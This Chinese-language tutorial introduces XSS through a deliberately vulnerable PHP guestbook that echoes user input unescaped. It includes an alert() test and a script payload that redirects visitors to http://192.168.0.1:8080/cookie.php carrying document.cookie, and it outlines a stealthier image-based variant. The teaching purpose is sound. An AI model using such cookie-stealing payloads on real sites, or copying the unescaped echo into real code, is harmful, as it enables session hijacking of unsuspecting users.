Web安全漏洞简介之XSS
随着互联网流行,以及网站互动性的提高,像论坛、微博还有各种web2.0应用的兴起,很多网站都可以由用户或多或少的参与,可能很多的网站用户注册之后都可以评论、发帖等等。
当然这些都是对正常向的用户来说的,如果是一个攻击者当然不会老老实实的发帖子之类的了。
众所周知,现在看到的网页基本都是用html、javascript、css等技术在浏览器端展示的,所以如果一个黑客输入的不是正常的评论,而是一段html、javascript、css等的浏览器支持的代码会如何呢?
下面来做个实验,这里我找了了一个”小明“同学写的简陋的类似留言板的php程序,功能就是简单的把用户提交的东西 再显示回去。
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>测试页面</title> </head> <body> <?php if(empty($_REQUEST["T1"]) === false) { echo "用户留言:".$_REQUEST["T1"]; } ?> <form method="POST" action=""> <p>留言:<br/> <textarea class="area-text" style="width: 708px; height: 75px; overflow: hidden;" name="T1"></textarea></p> <p><input type="submit" value="提交"></p> </form> </body> </html>
打开后样子如下:
输入一个你好,上面的用户留言里会显示一个你好,下面来输入一点好玩的:
于是当点击提交之后:
难道这里不应该是在用户留言里显示那句js代码么,让我们来看看页面的html代码在前后两次提交后有什么区别。
第一次:
很正常第二次:
注意刚才提交的<script>alert("This is a xsscode")</script>直接就成为web页面代码的一部分。
在这里让我们来回顾下我们的留言板代码,处理用户提交内容的那部分
<?php if(empty($_REQUEST["T1"]) === false) { echo "用户留言:".$_REQUEST["T1"]; } ?>
首先做了一个判断,检查参数T1是不是为空,之后不为空就执行下面的回显语句,在”用户留言:“后面拼接了T1参数中的内容,再回显到页面上。
可以看到这里,这个粗心的”小明“同学没有对T1的内容做任何检查,就返回给了用户,尼玛起码也得过滤个敏感词啊,网站上面冒个xx功出来要被查水表的。
于是我们就接触到了第一个xss漏洞,也就是跨站脚本,英文Cross-Site Script,这里缩写为了和常见的css(层叠样式表)区分就使用了xss。
xss漏洞很常见,程序员粗心对传入的参数没有检查,或者检查了、处理了,但是狡猾的黑客通过种种手段绕过去了都会造成xss漏洞。
与其他一些漏洞不太相同的是,受到xss漏洞直接攻击的是浏览器端,也就是当一个黑客发起攻击后,实际执行攻击代码的是浏览网站的用户所使用的浏览器,在这个过程中网站的服务器只是起到了一个”帮凶“的作用。
那么这种漏洞有什么危害呢(小明:人也就是弹个框有什么大不了的?)
现在转换一下场景,小明的boss又让小明写了一个论坛程序,各种努力认真,最后搞出了一个炫酷的论坛,用户很多发帖踊跃,boss十分happy。但是他仍然没注意xss漏洞的问题。
让我们用事实来教育小明
我构造了这么一个帖子,标题就叫hello,内容是这样的:
helloworld <script type=text/javascript>window.location = "http://192.168.0.1:8080/cookie.php?cookie="+document.cookie</script>
让我们发出去,等等看别人点开之后会发生什么
(演示向的程序,我太懒就不整到数据库里存了,脑补下小明点链接的动作就好):
这是什么,小明同学的cookie啊,用户名和密码都大喇喇的写在那里,而且还暴露了小明同学暗恋刘你妹的事情。
让我们来看看这个过程中发生了什么,首先咱们肯定是那个js代码搞的鬼,一共有三个部分
第一,document.cookie,这里获取了来看贴子人的cookie;
第二, "http://192.168.0.1:8080/cookie.php?cookie="+document. cookie 这部将获取到的cookie拼到了那个网址里的一个名为“cookie”的字段里;
第三,调用window.location将用户的浏览器指向了这个网址所以最后达到的效果是:把用户的cookie提交给了http://192.168.0.1:8080/coo kie.php 这个网页。
这个网页干了什么呢,很简单的将cookie字段取出然后回显出来。
当然回显出来并不严重,但是如果他是悄悄的存起来了呢?
如果黑客再高级一点,修改一下那个发出去的js代码,利用创建一个图片,将图片地址拼合cookie字段值指向那个cookie.php,然后在cookie.php那里保存并返回一个正常的图片。
oh,no,terrible.
黑客拿到小明的cookie之后,填到他的浏览器里,就能利用小明的身份在论坛上为所欲为了。
看,xss漏洞有多可怕。
======================
可能有人会觉得:“光拿个Cookie弱~爆~了~,老纸的论坛账户没什么用,能奈我何”,可是如果你的浏览器有漏洞,而黑客发了帖子利用xss漏洞扔了段触发漏洞的js,给你按个偷游戏币、网银木马,就真的不好玩了。
而且可怕的是,你明明上的光明正大的论坛,甚至看的是党史党章三观正确无比的帖子,有漏洞的话都会悄无声息的中招。